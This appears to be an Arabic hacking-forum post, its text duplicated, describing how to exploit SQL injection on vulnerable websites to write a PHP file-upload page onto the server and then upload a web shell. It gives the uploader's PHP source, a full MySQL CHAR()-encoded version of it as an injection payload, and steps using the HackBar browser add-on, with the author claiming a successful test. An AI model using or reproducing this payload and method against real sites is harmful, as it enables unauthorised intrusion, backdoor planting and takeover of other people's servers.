T-VAIROS Dz
New Member
استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل
السلام عليكم ورحمة الله وبركاته ...
قبل فترة اكثر من شهر خطرت ببالي فكرة ...
هي شلون نعمل مركز رفع من الخلال المواقع المصابة بـ SQL
الطريقة كالتالي ...
ناخذ سكربت مركز الرفع وهذا الكود بتاعه ...
لازم تكون هاذي اداة Hack Bar منصب على الفيرفوكس بتاعك
من هنا تضيف اداة
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
ونروح على ادادة Hack Bar الموجودة بالفايرفوكس ونختار
SQL > MySQL > MySQLCHAR
راح يظهر مستطيل صغير تخليه بيه اكواد مركز الرفع الي فوق وتضغك ok راح تحصل هذه التشفيرة
CHAR(60, 63, 112, 104, 112, 32, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 85, 112, 108, 111, 97, 100, 32, 67, 101, 110, 116, 101, 114, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 46, 112, 104, 112, 95, 117, 42, 42, 42, 42, 40, 41, 46, 39, 60, 98, 114, 62, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 102, 111, 114, 109, 32, 97, 99, 116, 105, 111, 110, 61, 34, 34, 32, 109, 101, 116, 104, 111, 100, 61, 34, 112, 111, 115, 116, 34, 32, 101, 110, 99, 116, 121, 112, 101, 61, 34, 109, 117, 108, 116, 105, 112, 97, 114, 116, 47, 102, 111, 114, 109, 45, 100, 97, 116, 97, 34, 32, 42, 42, 42, 42, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 32, 105, 100, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 105, 110, 112, 117, 116, 32, 116, 121, 112, 101, 61, 34, 102, 105, 108, 101, 34, 32, 42, 42, 42, 42, 61, 34, 102, 105, 108, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 48, 34, 62, 60, 105, 110, 112, 117, 116, 32, 42, 42, 42, 42, 61, 34, 95, 117, 112, 108, 34, 32, 116, 121, 112, 101, 61, 34, 115, 117, 98, 109, 105, 116, 34, 32, 105, 100, 61, 34, 95, 117, 112, 108, 34, 32, 118, 97, 108, 117, 101, 61, 34, 85, 112, 108, 111, 97, 100, 34, 62, 60, 47, 102, 111, 114, 109, 62, 39, 59, 32, 105, 102, 40, 32, 36, 95, 80, 79, 83, 84, 91, 39, 95, 117, 112, 108, 39, 93, 32, 61, 61, 32, 34, 85, 112, 108, 111, 97, 100, 34, 32, 41, 123, 32, 105, 102, 40, 64, 99, 111, 112, 121, 40, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 116, 109, 112, 95, 42, 42, 42, 42, 39, 93, 44, 32, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 42, 42, 42, 42, 39, 93, 41, 41, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 68, 111, 110, 101, 32, 33, 33, 33, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 32, 32, 101, 108, 115, 101, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 33, 33, 33, 33, 33, 33, 33, 85, 112, 108, 111, 97, 100, 32, 70, 97, 105, 108, 101, 100, 33, 33, 33, 33, 33, 33, 32, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 125, 63, 62)
-----------------------------
بعدها تاخذها على طول للعمود المصاب وتخليه مكانه وتضغط انتر وان شاء الله تشوف مركز الرفع امامك
ومن خلال المركز تكدر ترفع ملفاتك حتى الشل وتم التجربة وحمد لله انرفع لكن المشكلة بتحديد مساره
طيب يجي واحد يسأل كيف عرفت انرفع ..؟ لو ما انرفع كان السكربت طبع لك upload faild ....
واعتقد حل مشكلة المسار هي تنصيب سكربت مصاب على السيرفر الشخصي وتطبيق الفكرة ونشوف الشل وين ..
تحياتي اخوT-VIROS Dzـــــكم
قبل فترة اكثر من شهر خطرت ببالي فكرة ...
هي شلون نعمل مركز رفع من الخلال المواقع المصابة بـ SQL
الطريقة كالتالي ...
ناخذ سكربت مركز الرفع وهذا الكود بتاعه ...
PHP:
<?php
echo '<b>Upload Center</b>';
echo '<b><br><br>'.php_u****().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">';
echo '<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST***91;'_upl'***93; == "Upload" ){ if(@copy($_FILES***91;'file'***93;***91;'tmp_****'***93;, $_FILES***91;'file'***93;***91;'****'***93;)) { echo '<b>Done !!!</b><br><br>'; }
else { echo '<b>!!!!!!!Upload Failed!!!!!! </b><br><br>'; }}?>من هنا تضيف اداة
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
ونروح على ادادة Hack Bar الموجودة بالفايرفوكس ونختار
SQL > MySQL > MySQLCHAR
راح يظهر مستطيل صغير تخليه بيه اكواد مركز الرفع الي فوق وتضغك ok راح تحصل هذه التشفيرة
CHAR(60, 63, 112, 104, 112, 32, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 85, 112, 108, 111, 97, 100, 32, 67, 101, 110, 116, 101, 114, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 46, 112, 104, 112, 95, 117, 42, 42, 42, 42, 40, 41, 46, 39, 60, 98, 114, 62, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 102, 111, 114, 109, 32, 97, 99, 116, 105, 111, 110, 61, 34, 34, 32, 109, 101, 116, 104, 111, 100, 61, 34, 112, 111, 115, 116, 34, 32, 101, 110, 99, 116, 121, 112, 101, 61, 34, 109, 117, 108, 116, 105, 112, 97, 114, 116, 47, 102, 111, 114, 109, 45, 100, 97, 116, 97, 34, 32, 42, 42, 42, 42, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 32, 105, 100, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 105, 110, 112, 117, 116, 32, 116, 121, 112, 101, 61, 34, 102, 105, 108, 101, 34, 32, 42, 42, 42, 42, 61, 34, 102, 105, 108, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 48, 34, 62, 60, 105, 110, 112, 117, 116, 32, 42, 42, 42, 42, 61, 34, 95, 117, 112, 108, 34, 32, 116, 121, 112, 101, 61, 34, 115, 117, 98, 109, 105, 116, 34, 32, 105, 100, 61, 34, 95, 117, 112, 108, 34, 32, 118, 97, 108, 117, 101, 61, 34, 85, 112, 108, 111, 97, 100, 34, 62, 60, 47, 102, 111, 114, 109, 62, 39, 59, 32, 105, 102, 40, 32, 36, 95, 80, 79, 83, 84, 91, 39, 95, 117, 112, 108, 39, 93, 32, 61, 61, 32, 34, 85, 112, 108, 111, 97, 100, 34, 32, 41, 123, 32, 105, 102, 40, 64, 99, 111, 112, 121, 40, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 116, 109, 112, 95, 42, 42, 42, 42, 39, 93, 44, 32, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 42, 42, 42, 42, 39, 93, 41, 41, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 68, 111, 110, 101, 32, 33, 33, 33, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 32, 32, 101, 108, 115, 101, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 33, 33, 33, 33, 33, 33, 33, 85, 112, 108, 111, 97, 100, 32, 70, 97, 105, 108, 101, 100, 33, 33, 33, 33, 33, 33, 32, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 125, 63, 62)
-----------------------------
بعدها تاخذها على طول للعمود المصاب وتخليه مكانه وتضغط انتر وان شاء الله تشوف مركز الرفع امامك
ومن خلال المركز تكدر ترفع ملفاتك حتى الشل وتم التجربة وحمد لله انرفع لكن المشكلة بتحديد مساره
طيب يجي واحد يسأل كيف عرفت انرفع ..؟ لو ما انرفع كان السكربت طبع لك upload faild ....
واعتقد حل مشكلة المسار هي تنصيب سكربت مصاب على السيرفر الشخصي وتطبيق الفكرة ونشوف الشل وين ..
تحياتي اخوT-VIROS Dzـــــكم
اسم الموضوع : استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل
|
المصدر : SQL قواعد البيانات
